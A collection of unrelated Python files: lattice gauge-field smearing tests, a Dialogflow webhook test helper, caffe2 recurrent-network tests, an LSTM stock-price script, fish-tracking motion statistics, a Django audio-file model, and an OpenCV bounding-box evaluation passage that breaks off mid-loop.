with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseX(self):
y, ld, _ = self.ss(self.testField)
sx = tf.reverse(self.testField, [2])
sx = tf.stack([tf.roll(-sx[:,0], -1, 1), sx[:,1]], 1)
ss = []
for s in self.ss.chain:
            if s.linkDir != 1:  # first link points along the other direction
x0 = s.linkFirst[0]-1
if x0<0:
x0 += s.linkRepeat[0]
ss.append(ftr.GenericStoutSmear(((x0,s.linkFirst[1]),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient))
else:
ss.append(s)
sy, sld, _ = ftr.TransformChain(ss)(sx)
sy = tf.reverse(tf.stack([tf.roll(-sy[:,0], 1, 1), sy[:,1]], 1), [2])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_reverseY(self):
y, ld, _ = self.ss(self.testField)
sx = tf.reverse(self.testField, [3])
sx = tf.stack([sx[:,0], tf.roll(-sx[:,1], -1, 2)], 1)
ss = []
for s in self.ss.chain:
            if s.linkDir != 2:  # first link points along the other direction
x1 = s.linkFirst[1]-1
if x1<0:
x1 += s.linkRepeat[1]
ss.append(ftr.GenericStoutSmear(((s.linkFirst[0],x1),s.linkRepeat), s.updatedLoops, s.fixedLoopLayers, s.layerCoefficient))
else:
ss.append(s)
sy, sld, _ = ftr.TransformChain(ss)(sx)
sy = tf.reverse(tf.stack([sy[:,0], tf.roll(-sy[:,1], 1, 2)], 1), [3])
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(y, sy)), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
def test_symmetry_gauge(self):
G = tf.random.get_global_generator().uniform(self.latticeShape, -math.pi, math.pi, dtype=tf.float64)
u = group.U1Phase
tx = tf.stack(
[u.mul(u.mul(G,self.testField[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
y, ld, _ = self.ss(self.testField)
ty = tf.stack(
[u.mul(u.mul(G,y[:,d]), tf.roll(G, -1, axis=1+d), adjoint_r=True) for d in range(2)],
1)
sy, sld, _ = self.ss(tx)
with self.subTest(test='field'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(u.compatProj(ty), u.compatProj(sy))), 1E-26)
with self.subTest(test='logdet'):
self.assertLess(tf.reduce_mean(tf.math.squared_difference(ld, sld)), 1E-26)
class TestConvChain(TestChain):
def setUp(self):
pi = tf.constant(math.pi, dtype=tf.float64)
op0 = (((1,2,-1,-2), (1,-2,-1,2)),
((1,1,2,-1,-1,-2), (1,1,-2,-1,-1,2), (1,2,-1,-1,-2,1), (1,-2,-1,-1,2,1)))
op1 = (((2,-1,-2,1), (2,1,-2,-1)),
((2,2,-1,-2,-2,1), (2,2,1,-2,-2,-1), (2,-1,-2,-2,1,2), (2,1,-2,-2,-1,2)))
self.testShape = (3,2,8,6)
self.latticeShape = (self.testShape[0],)+self.testShape[2:]
self.testField = tf.random.get_global_generator().uniform(self.testShape, -math.pi, math.pi, dtype=tf.float64)
fixedP = (1,2,-1,-2)
fixedR0 = (2,2,1,-2,-2,-1)
fixedR1 = (1,1,2,-1,-1,-2)
convP0 = lambda: ftr.PeriodicConv((
tk.layers.Conv2D(2, (3,2), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
))
convP1 = lambda: ftr.PeriodicConv((
tk.layers.Conv2D(2, (2,3), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
))
convR = lambda pad: ftr.PeriodicConv((
tk.layers.Conv2D(2, (3,3), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
), pad)
conv = lambda: ftr.PeriodicConv((
tk.layers.Conv2D(2, (3,3), activation='gelu', kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
tk.layers.Conv2D(2, (3,3), activation=None, kernel_initializer=tk.initializers.RandomNormal(), bias_initializer=tk.initializers.RandomNormal()),
))
self.ss = ftr.TransformChain([
ftr.GenericStoutSmear(((0,0),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((0,1),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((1,0),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((1,1),(2,2)), op0, [(fixedP, convP0()), (fixedR0, convR((1,2)))], conv()),
ftr.GenericStoutSmear(((0,0),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
ftr.GenericStoutSmear(((0,1),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
ftr.GenericStoutSmear(((1,0),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
ftr.GenericStoutSmear(((1,1),(2,2)), op1, [(fixedP, convP1()), (fixedR1, convR((2,1)))], conv()),
])
self.ss.build(self.testShape)
def test_symmetry_reverseX(self):
# need to flip conv layer weights
pass
def test_symmetry_reverseY(self):
# need to flip conv layer weights
pass
if __name__ == '__main__':
tf.random.set_seed(9876543211)
tf.keras.backend.set_floatx('float64')
tf.config.set_soft_device_placement(True)
tf.config.optimizer.set_jit(False)
tf.config.threading.set_inter_op_parallelism_threads(1) # ALCF suggests number of socket
tf.config.threading.set_intra_op_parallelism_threads(4) # ALCF suggests number of physical cores
os.environ["OMP_NUM_THREADS"] = "4"
os.environ["KMP_BLOCKTIME"] = "0"
os.environ["KMP_SETTINGS"] = "1"
os.environ["KMP_AFFINITY"]= "granularity=fine,verbose,compact,1,0"
unittest.main()
|
import json
def build_payload(intent, params={}, contexts=[], action='test_action', query='test query'):
return json.dumps({
"id": "8ea2d357-10c0-40d1-b1dc-e109cd714f67",
"timestamp": "2017-06-26T22:43:14.935Z",
"lang": "en",
"result": {
"action": action,
"actionIncomplete": False,
"contexts": contexts,
"fulfillment": {
"messages": [],
"speech": ""
},
"metadata": {
"intentId": "some-intent-id",
"intentName": intent,
"webhookForSlotFillingUsed": "false",
"webhookUsed": "true"
},
"parameters": params,
"resolvedQuery": query,
"score": 1.0,
"source": "agent",
"speech": ""
},
"status": {
"code": 200,
"errorType": "success"
},
"sessionId": "c24d9cfe-21c9-4fc0-a5eb-1a2ee1fec29c"
})
def get_query_response(client, payload):
resp = client.post('/', data=payload)
assert resp.status_code == 200
return json.loads(resp.data.decode('utf-8'))
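# A minimal usage sketch (the Flask test client fixture `client` and the intent
# name are assumptions for illustration, not part of this module):
def example_webhook_roundtrip(client):
    payload = build_payload('test_intent', params={'city': 'Oslo'})
    response = get_query_response(client, payload)
    return response.get('speech')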
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import recurrent, workspace
from caffe2.python.model_helper import ModelHelper
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
class RecurrentNetworkTest(hu.HypothesisTestCase):
@given(T=st.integers(1, 4),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_sum_mul(self, T, n, d):
model = ModelHelper(name='external')
input_blob, initial_input_blob = model.net.AddExternalInputs(
'input', 'initial_input')
step = ModelHelper(name='step', param_model=model)
input_t, output_t_prev = step.net.AddExternalInput(
'input_t', 'output_t_prev')
output_t_internal = step.net.Sum([input_t, output_t_prev])
output_t = step.net.Mul([input_t, output_t_internal])
step.net.AddExternalOutput(output_t)
self.simple_rnn(T, n, d, model, step, input_t, output_t, output_t_prev,
input_blob, initial_input_blob)
@given(T=st.integers(1, 4),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_mul(self, T, n, d):
model = ModelHelper(name='external')
input_blob, initial_input_blob = model.net.AddExternalInputs(
'input', 'initial_input')
step = ModelHelper(name='step', param_model=model)
input_t, output_t_prev = step.net.AddExternalInput(
'input_t', 'output_t_prev')
output_t = step.net.Mul([input_t, output_t_prev])
step.net.AddExternalOutput(output_t)
self.simple_rnn(T, n, d, model, step, input_t, output_t, output_t_prev,
input_blob, initial_input_blob)
def simple_rnn(self, T, n, d, model, step, input_t, output_t, output_t_prev,
input_blob, initial_input_blob):
input = np.random.randn(T, n, d).astype(np.float32)
initial_input = np.random.randn(1, n, d).astype(np.float32)
print(locals())
recurrent.recurrent_net(
net=model.net,
cell_net=step.net,
inputs=[(input_t, input_blob)],
initial_cell_inputs=[(output_t_prev, initial_input_blob)],
links={output_t_prev: output_t},
scope="test_rnn_sum_mull",
)
workspace.blobs[input_blob] = input
workspace.blobs[initial_input_blob] = initial_input
op = model.net._net.op[-1]
        # Conveniently store all inputs in an array in the same
        # order as op.input
inputs = [workspace.blobs[name] for name in op.input]
def reference(input, initial_input):
global_ws_name = workspace.CurrentWorkspace()
input_all = workspace.blobs[input_blob]
workspace.SwitchWorkspace("ref", create_if_missing=True)
workspace.blobs[input_blob] = input
workspace.blobs[output_t_prev] = initial_input.reshape(n, d)
res_all = np.zeros(shape=input.shape, dtype=np.float32)
for t_cur in range(T):
workspace.blobs[input_t] = input_all[t_cur]
workspace.RunNetOnce(step.net)
result_t = workspace.blobs[output_t]
workspace.blobs[output_t_prev] = result_t
res_all[t_cur] = result_t
workspace.SwitchWorkspace(global_ws_name)
shape = list(input.shape)
shape[0] = 1
return (res_all, res_all[-1].reshape(shape))
self.assertReferenceChecks(
device_option=hu.cpu_do,
op=op,
inputs=inputs,
reference=reference,
output_to_grad=op.output[0],
outputs_to_check=[0, 1],
)
self.assertGradientChecks(
device_option=hu.cpu_do,
op=op,
inputs=inputs,
outputs_to_check=0,
outputs_with_grads=[0],
threshold=0.01,
stepsize=0.005,
)
# Hacky version of 1-D convolution
def _convolution_1d(
self,
model,
inputs,
conv_window,
conv_filter,
conv_bias,
output_name,
left_pad,
):
if left_pad:
padding_width = conv_window - 1
else:
padding_width = 0
# [batch_size, inputs_length, state_size]
inputs_transposed = model.net.Transpose(
inputs,
'inputs_transposed',
axes=[1, 0, 2],
)
# [batch_size, 1, inputs_length, state_size]
inputs_transposed_4d = model.net.ExpandDims(
inputs_transposed,
'inputs_transposed_4d',
dims=[1],
)
# [batch_size, 1, inputs_length - conv_window + 1, state_size]
output_transposed_4d = model.net.Conv(
[inputs_transposed_4d, conv_filter, conv_bias],
output_name + '_transposed_4d',
kernel_h=1,
kernel_w=conv_window,
order='NHWC',
pad_t=0,
pad_l=padding_width,
pad_b=0,
pad_r=0,
)
# [batch_size, inputs_length - conv_window + 1, state_size]
output_transposed = model.net.Squeeze(
output_transposed_4d,
output_name + '_transposed',
dims=[1],
)
# [inputs_length - conv_window + 1, batch_size, state_size]
output = model.net.Transpose(
output_transposed,
output_name,
axes=[1, 0, 2],
)
return output
@given(sequence_length=st.integers(3, 7),
conv_window=st.integers(1, 3),
batch_size=st.integers(1, 5),
state_size=st.integers(1, 5))
def test_stateful_convolution_forward_only(
self,
sequence_length,
conv_window,
batch_size,
state_size,
):
        '''
        This unit test demonstrates another way of using RecurrentNetwork.
        Imagine that you want to compute a convolution over a sequence,
        but the sequence elements are not given to you from the beginning,
        so you have to loop over the sequence and compute the convolution
        for each element separately. This situation can occur during the
        inference/generation step of a neural network.
        First of all, you have to provide the actual input via recurrent states,
        since the input of RecurrentNetwork should be known in advance.
        Here, we use `fake_inputs` as the input,
        and it's used by the op to extract the batch size and sequence length.
        The actual input sequence is stored in the recurrent state
        `input_state`. At every step we generate a new element via input_state_t
        (in this example, input_state_t is generated at random, but
        in a real situation it can be created using the convolution output
        from the previous step).
        A few important differences from the regular RecurrentNetwork use case:
        1. input_state_t_prev is not just a single previous element of the
        input_state sequence. It is the last conv_window elements including (!)
        the current one - input_state_t. We specify that using the `link_window`
        argument of RecurrentNetwork. We need that many elements to
        compute a single convolution step. Also, note that `link_window`
        specifies how many elements to link starting at the
        `timestep` + `link_offset` position.
        2. The first few steps might require additional zero padding from the left,
        since not enough elements of the input_state sequence are available yet.
        So the initial state for input_state contains several elements
        (exactly as many pads as we need for the first step). Also, because of
        that, all offsetting over the input_state sequence is shifted
        by the length of initial_input_state: see the `link_offset` and `alias_offset`
        arguments of RecurrentNetwork.
        In this test, we assert that we get the same result
        if we apply the convolution over all elements simultaneously,
        since the whole input_state sequence was generated by the end.
        '''
model = ModelHelper(name='model')
fake_inputs = model.param_init_net.UniformFill(
[],
'fake_inputs',
min=-1.0,
max=1.0,
shape=[sequence_length, batch_size, state_size],
)
initial_input_state = model.param_init_net.ConstantFill(
[],
'initial_input_state',
value=0.0,
shape=[conv_window - 1, batch_size, state_size],
)
initial_output_state = model.param_init_net.ConstantFill(
[],
'initial_output_state',
value=0.0,
shape=[1, batch_size, state_size],
)
step_model = ModelHelper(name='step_model', param_model=model)
(
fake_input_t,
timestep,
input_state_t_prev,
) = step_model.net.AddExternalInputs(
'fake_input_t',
'timestep',
'input_state_t_prev',
)
conv_filter = step_model.param_init_net.XavierFill(
[],
'conv_filter',
shape=[state_size, 1, conv_window, state_size],
)
conv_bias = step_model.param_init_net.ConstantFill(
[],
'conv_bias',
shape=[state_size],
value=0.0,
)
step_model.params.extend([conv_filter, conv_bias])
input_state_t = step_model.net.UniformFill(
[],
'input_state_t',
min=-1.0,
max=1.0,
shape=[1, batch_size, state_size],
)
output_state_t = self._convolution_1d(
model=step_model,
inputs=input_state_t_prev,
conv_window=conv_window,
conv_filter=conv_filter,
conv_bias=conv_bias,
output_name='output_state_t',
left_pad=False,
)
initial_recurrent_states = [initial_input_state, initial_output_state]
all_inputs = (
[fake_inputs] + step_model.params + initial_recurrent_states
)
all_outputs = ['input_state_all', 'output_state_all']
recurrent_states = ['input_state', 'output_state']
input_state_all, output_state_all, _ = model.net.RecurrentNetwork(
all_inputs,
all_outputs + ['step_workspaces'],
param=[all_inputs.index(p) for p in step_model.params],
alias_src=recurrent_states,
alias_dst=all_outputs,
alias_offset=[conv_window - 1, 1],
recurrent_states=recurrent_states,
initial_recurrent_state_ids=[
all_inputs.index(s) for s in initial_recurrent_states
],
link_internal=[
str(input_state_t_prev),
str(input_state_t),
str(output_state_t),
],
link_external=['input_state', 'input_state', 'output_state'],
link_offset=[0, conv_window - 1, 1],
link_window=[conv_window, 1, 1],
backward_link_internal=[],
backward_link_external=[],
backward_link_offset=[],
step_net=str(step_model.net.Proto()),
backward_step_net='',
timestep='timestep' if timestep is None else str(timestep),
outputs_with_grads=[],
)
output_states_2 = self._convolution_1d(
model=model,
inputs=input_state_all,
conv_window=conv_window,
conv_filter=conv_filter,
conv_bias=conv_bias,
output_name='output_states_2',
left_pad=True,
)
workspace.RunNetOnce(model.param_init_net)
workspace.RunNetOnce(model.net)
np.testing.assert_almost_equal(
workspace.FetchBlob(output_state_all),
workspace.FetchBlob(output_states_2),
decimal=3,
)
|
# import packages
import pandas as pd
import numpy as np
# to plot within notebook
import matplotlib
matplotlib.use('GTK3Agg')
import matplotlib.pyplot as plt
# importing required libraries
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, Dropout, LSTM
#
# rcParams['figure.figsize'] = 20,10
# read the file
df = pd.read_csv('NSE-TATAGLOBAL11.csv')
df.head()
#setting index as date
df['Date'] = pd.to_datetime(df.Date,format='%Y-%m-%d')
df.index = df['Date']
#plot
plt.figure(figsize=(16,8))
plt.plot(df['Close'], label='Close Price history')
# creating dataframe
data = df.sort_index(ascending=True, axis=0)
new_data = pd.DataFrame(index=range(0, len(df)), columns=['Date', 'Close'])
for i in range(0, len(data)):
new_data['Date'][i] = data['Date'][i]
new_data['Close'][i] = data['Close'][i]
# setting index
new_data.index = new_data.Date
new_data.drop('Date', axis=1, inplace=True)
# creating train and test sets
dataset = new_data.values
train = dataset[0:987, :]
valid = dataset[987:, :]
# converting dataset into x_train and y_train
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(dataset)
x_train, y_train = [], []
for i in range(60, len(train)):
x_train.append(scaled_data[i-60:i, 0])
y_train.append(scaled_data[i, 0])
x_train, y_train = np.array(x_train), np.array(y_train)
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
# create and fit the LSTM network
model = Sequential()
model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1], 1)))
model.add(LSTM(units=50))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(x_train, y_train, epochs=1, batch_size=1, verbose=2)
# predicting 246 values, using past 60 from the train data
inputs = new_data[len(new_data) - len(valid) - 60:].values
inputs = inputs.reshape(-1, 1)
inputs = scaler.transform(inputs)
X_test = []
for i in range(60, inputs.shape[0]):
X_test.append(inputs[i-60:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
closing_price = model.predict(X_test)
closing_price = scaler.inverse_transform(closing_price)
# for plotting
train = new_data[:987]
valid = new_data[987:].copy()  # copy avoids pandas SettingWithCopyWarning below
print(valid)
valid['Predictions'] = closing_price
plt.plot(train['Close'])
plt.plot(valid[['Close','Predictions']])
plt.show()
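# An optional evaluation sketch (not in the original script): RMSE between the
# held-out closing prices and the model's predictions.
rms = np.sqrt(np.mean((valid['Close'].values.astype(float) - valid['Predictions'].values.astype(float)) ** 2))
print('Validation RMSE:', rms)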
|
import os
import argparse
import pandas as pd
import numpy as np
def getStats(x):
"""
    Takes an input numpy array and calculates the mean, standard deviation, median, min and max values of the array
Input:
x: numpy array
Output:
        Returns the mean, std. dev., median, min and max
"""
return np.mean(x), np.std(x), np.median(x), np.min(x), np.max(x)
def getdisplacement(pos):
"""
    Takes a numpy array containing position information and calculates the displacement
Input:
pos: numpy array containing position information
Output:
        diff: numpy array containing displacement information
"""
diff = []
for idx in range(1, pos.shape[0]):
pos1 = pos[idx-1]
pos2 = pos[idx]
diff.append(np.linalg.norm(pos2-pos1))
return np.asarray(diff)
def getSpeed(displacement, deltaT):
"""
    Takes a numpy array containing displacement information and calculates the speed at a given deltaT
    Input:
        displacement: numpy array containing displacement information
deltaT: float indicating the time step
Output:
speed: numpy array containing speed information
"""
speed = []
for idx in range(1, displacement.shape[0]):
disp1 = displacement[idx-1]
disp2 = displacement[idx]
speed.append(np.linalg.norm(disp2-disp1) / deltaT)
return np.asarray(speed)
def getAcceleration(speed, deltaT):
"""
    Takes a numpy array containing speed information and calculates the acceleration at a given deltaT
Input:
speed: numpy array containing speed information
deltaT: float indicating the time step
Output:
acceleration: numpy array containing acceleration information
"""
acceleration = []
for idx in range(1, speed.shape[0]):
speed1 = speed[idx-1]
speed2 = speed[idx]
acceleration.append(np.linalg.norm(speed2-speed1) / deltaT)
return np.asarray(acceleration)
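# A small illustrative check (synthetic positions, not project data): a point
# moving one unit per frame gives constant displacement, so the diff-based
# speed and acceleration defined above are zero.
def _demo_motion_stats():
    pos = np.array([[0.0, 0.0], [1.0, 0.0], [2.0, 0.0], [3.0, 0.0]])
    disp = getdisplacement(pos)           # [1., 1., 1.]
    speed = getSpeed(disp, 1 / 60)        # [0., 0.]
    acc = getAcceleration(speed, 1 / 60)  # [0.]
    return getStats(disp), speed, acc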
def analyzeReprojectionError(df):
"""
Collects and computes the combined reprojection error
Input:
df: Pandas Dataframe containing the annotated dataset
Output:
reproj_data: Numpy array containing the combined reprojection error
"""
df["reproj_err"] = df["cam1_reproj_err"] + df["cam2_reproj_err"]
reproj_data = df["reproj_err"].values
reproj_data = reproj_data[np.isfinite(reproj_data)]
return reproj_data
def analyzeMotionCharateristics(df):
"""
    Collects and computes the different motion characteristics (displacement, speed, acceleration) from the annotated dataset
Input:
df: Pandas Dataframe containing the annotated dataset
Output:
total_disp: Dict containing the displacement information from all fish ID
total_speed: Dict containing the speed information from all fish ID
total_acc: Dict containing the acceleration information from all fish ID
"""
total_disp = {"3D" : []}
total_speed = {"3D" : []}
total_acc = {"3D" : []}
for ids in df["id"].unique():
tmp_df = df[df["id"] == ids]
world_pos = np.stack((tmp_df["3d_x"], tmp_df["3d_y"], tmp_df["3d_z"]),-1)
world_pos = world_pos[ ~np.isnan(world_pos).any(axis=1)]
coords = {"3D": world_pos}
for key in coords:
pos = coords[key]
disp = getdisplacement(pos)
speed = getSpeed(disp, 1/60)
acc = getAcceleration(speed, 1/60)
total_disp[key].extend(disp)
total_speed[key].extend(speed)
total_acc[key].extend(acc)
return total_disp, total_speed, total_acc
def getDistributionSettings(args):
"""
    Calculates the distribution parameters of the reprojection error and motion characteristics, based on the annotated dataset
"""
rootdir = args["gtPath"]
dirs = {"train": [os.path.join(rootdir, x) for x in ["TRN2", "TRN5"]],
"valid": [os.path.join(rootdir, x) for x in ["VAL2", "VAL5"]],
"test": [os.path.join(rootdir, x) for x in ["TST1", "TST2","TST5", "TST10"]]}
for key in dirs.keys():
disp = []
speed = []
acc = []
reproj = []
for directory in dirs[key]:
gt_directory = os.path.join(directory, "GT")
ann_df = pd.read_csv(os.path.join(gt_directory, "annotations_full.csv"), sep=";")
reproj_data = analyzeReprojectionError(ann_df)
disp_dict, speed_dict, acc_dict = analyzeMotionCharateristics(ann_df)
disp.extend(disp_dict["3D"])
speed.extend(speed_dict["3D"])
acc.extend(acc_dict["3D"])
reproj.extend(reproj_data)
reproj_mean, reproj_std, reproj_median, reproj_min, reproj_max = getStats(reproj)
disp_mean, disp_std, disp_median, disp_min, disp_max = getStats(disp)
speed_mean, speed_std, speed_median, speed_min, speed_max = getStats(speed)
acc_mean, acc_std, acc_median, acc_min, acc_max = getStats(acc)
with open(os.path.join(rootdir, key+"_stats.txt"), "w") as f:
f.write("Reproj Mean: {}\n".format(reproj_mean))
f.write("Reproj Std.Dev: {}\n".format(reproj_std))
f.write("Reproj Median: {}\n".format(reproj_median))
f.write("Reproj Min: {}\n".format(reproj_min))
f.write("Reproj Max: {}\n\n".format(reproj_max))
f.write("Displacement Mean: {}\n".format(disp_mean))
f.write("Displacement Std.Dev: {}\n".format(disp_std))
f.write("Displacement Median: {}\n".format(disp_median))
f.write("Displacement Min: {}\n".format(disp_min))
f.write("Displacement Max: {}\n\n".format(disp_max))
f.write("Speed Mean: {}\n".format(speed_mean))
f.write("Speed Std.Dev: {}\n".format(speed_std))
f.write("Speed Median: {}\n".format(speed_median))
f.write("Speed Min: {}\n".format(speed_min))
f.write("Speed Max: {}\n\n".format(speed_max))
f.write("Acceleration Mean: {}\n".format(acc_mean))
f.write("Acceleration Std.Dev: {}\n".format(acc_std))
f.write("Acceleration Median: {}\n".format(acc_median))
f.write("Acceleration Min: {}\n".format(acc_min))
f.write("Acceleration Max: {}\n\n".format(acc_max))
if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Calculates the distribution parameters for reprojection error and motion characteristics")
ap.add_argument("-gtPath", "--gtPath", type=str, help="Path to the ground truth directory")
args = vars(ap.parse_args())
getDistributionSettings(args) |
#
# django-audiofield License
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2014 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
from __future__ import unicode_literals
import six
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from audiofield.fields import AudioField
try:
from django.contrib.auth import get_user_model
User = settings.AUTH_USER_MODEL
except ImportError:
from django.contrib.auth.models import User
@six.python_2_unicode_compatible
class AudioFile(models.Model):
"""
This Model describe the Audio used on the platform,
this allow to upload audio file and configure
alternate Text2Speech System
"""
name = models.CharField(max_length=150, blank=False, verbose_name=_('audio name'),
help_text=_('audio file label'))
audio_file = AudioField(upload_to='upload/audiofiles', blank=True,
ext_whitelist=('.mp3', '.wav', '.ogg'),
verbose_name=_('audio file'))
user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_('user'),
help_text=_('select user'))
created_date = models.DateTimeField(auto_now_add=True)
updated_date = models.DateTimeField(auto_now=True)
class Meta:
permissions = (
('can_view_audiofile', _('can see Audio Files')),
)
db_table = 'audio_file'
verbose_name = _('audio file')
verbose_name_plural = _('audio files')
def __str__(self):
return '[%s] %s' % (self.id, self.name)
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
# Call the "real" save() method
super(AudioFile, self).save(force_insert, force_update, using, update_fields)
def audio_file_player(self):
"""audio player tag for admin"""
if self.audio_file:
file_url = settings.MEDIA_URL + str(self.audio_file)
player_string = '<audio src="%s" controls>Your browser does not support the audio element.</audio>' % \
(file_url)
return player_string
audio_file_player.allow_tags = True
audio_file_player.short_description = _('audio file player')
|
import time, json, os
import cv2
import numpy as np
from numpy import shape, dstack
from collections import defaultdict
start_time = time.time()
# Training Set
os.chdir('/mnt/data/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set')
## Decode JSON file and store all the corner coordinates of ground truth in an array
json_data = open('T4_r3p6') # list[z][:-4]
data = json.load(json_data)
brx, tlx, bry, tly = [], [], [], []
for x in range(shape(data["Image_data"]["boundingboxes"][:])[0]):
brx.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_x"])
tlx.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_x"])
bry.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_y"])
tly.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_y"])
brx = np.array(brx)
bry = np.array(bry)
tly = np.array(tly)
tlx = np.array(tlx)
x,y,x1,y1 = tlx+3, tly+3, brx, bry
# Training Set LCN Labelled
os.chdir('/mnt/data/shamir/Annotation data set/Normalized Images/Good Images/Postive Counts/TrainingSet_LCN_Labelled_1.2')
# Get corner coordinates of the detected bounding boxes (single image)
im = cv2.imread('T4_r3p6.jpg', cv2.IMREAD_COLOR)  # IMREAD_COLOR supersedes the removed cv2.CV_LOAD_IMAGE_COLOR
im_can = cv2.Canny(im, 100, 200)
cnt, hierarchy = cv2.findContours(im_can,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
i = 0
a, b, a1, b1 = [], [], [], []
while i < len(cnt):  # len() avoids np.shape on a ragged list of contours
m,n,w,h = cv2.boundingRect(cnt[i])
m = m+2
n = n+2
w = w+2
h = h+2
a.append(m)
b.append(n)
a1.append(m+w)
b1.append(n+h)
i += 2
a = np.array(a)
b = np.array(b)
a1 = np.array(a1)
b1 = np.array(b1)
# Get all the coordinates of both ground truth (gt) and detected (dt) boxes
x_val, y_val, a_val, b_val = [], [], [], []
# gt
bb_gt_pixels = []
for k in range(shape(x)[0]):
bb_gt_pixels.append([])
for i in range(x[k], x1[k]+1):
for j in range(y[k], y1[k]+1):
x_val.append(i)
y_val.append(j)
x_val = np.array(x_val)
y_val = np.array(y_val)
bb_gt_pixels[k].append(dstack([x_val, y_val]))
x_val, y_val = [], []
bb_gt_pixels = np.array(bb_gt_pixels)
#dt
bb_dt_pixels = []
for k in range(shape(a)[0]):
bb_dt_pixels.append([])
for i in range(a[k], a1[k]+1):
for j in range(b[k], b1[k]+1):
a_val.append(i)
b_val.append(j)
a_val = np.array(a_val)
b_val = np.array(b_val)
bb_dt_pixels[k].append(dstack([a_val, b_val]))
a_val, b_val = [], []
bb_dt_pixels = np.array(bb_dt_pixels)
## Assign numbers to the corresponding Bounding Boxes
# NOTE: `grid` and `grid_ref` below are assumed to be defined earlier in the
# original session (not shown here); they partition the image into cells.
#gt
bb_gt_ref = defaultdict(list)
for i in range(shape(bb_gt_pixels)[0]):
for j in range(shape(grid)[0]):
        if (bb_gt_pixels[i,0,0][0,0] <= list(grid_ref.items())[j][1][0][0,0,4799,0]) & (bb_gt_pixels[i,0,0][0,1] <= list(grid_ref.items())[j][1][0][0,0,4799,1]):
bb_gt_ref[j].append(bb_gt_pixels[i][0][0])
break
#dt
bb_dt_ref = defaultdict(list)
for i in range(shape(bb_dt_pixels)[0]):
for j in range(shape(grid)[0]):
        if (bb_dt_pixels[i,0,0][0,0] <= list(grid_ref.items())[j][1][0][0,0,4799,0]) & (bb_dt_pixels[i,0,0][0,1] <= list(grid_ref.items())[j][1][0][0,0,4799,1]):
bb_dt_ref[j].append(bb_dt_pixels[i][0][0])
break
## The ultimate evaluation algo #Idea: divide the image into smaller grids and compare bounding boxes in a smaller neighbourhood
ref = []
common_pixels, match, false_pos, false_neg = 0, 0, 0, 0
for k,v in bb_dt_ref.items():
ref.append(k)
ref = np.array(ref)
for k, v in bb_gt_ref.items():
if (ref == k).any() == True:
if (shape(bb_gt_ref.get(k))[0] == 1) & (shape(bb_dt_ref.get(k))[0] == 1):
for m in range(shape(bb_gt_ref.get(k))[1]):
for n in range(shape(bb_dt_ref.get(k))[1]):
if (bb_gt_ref.get(k)[0][m] == bb_dt_ref.get(k)[0][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
all_pixels = shape(bb_gt_ref.get(k))[1] + shape(bb_dt_ref.get(k))[1] - common_pixels # union
match_value = common_pixels / float(all_pixels)
if match_value > 0.5:
match += 1
common_pixels = 0
elif (shape(bb_gt_ref.get(k))[0] == 1) & (shape(bb_dt_ref.get(k))[0] > 1):
for a in range(shape(bb_dt_ref.get(k))[0]):
for m in range(shape(bb_gt_ref.get(k))[1]):
for n in range(shape(bb_dt_ref.get(k)[a])[0]):
if (bb_gt_ref.get(k)[0][m] == bb_dt_ref.get(k)[a][n]).all() == True:
common_pixels += 1
if common_pixels > 0:
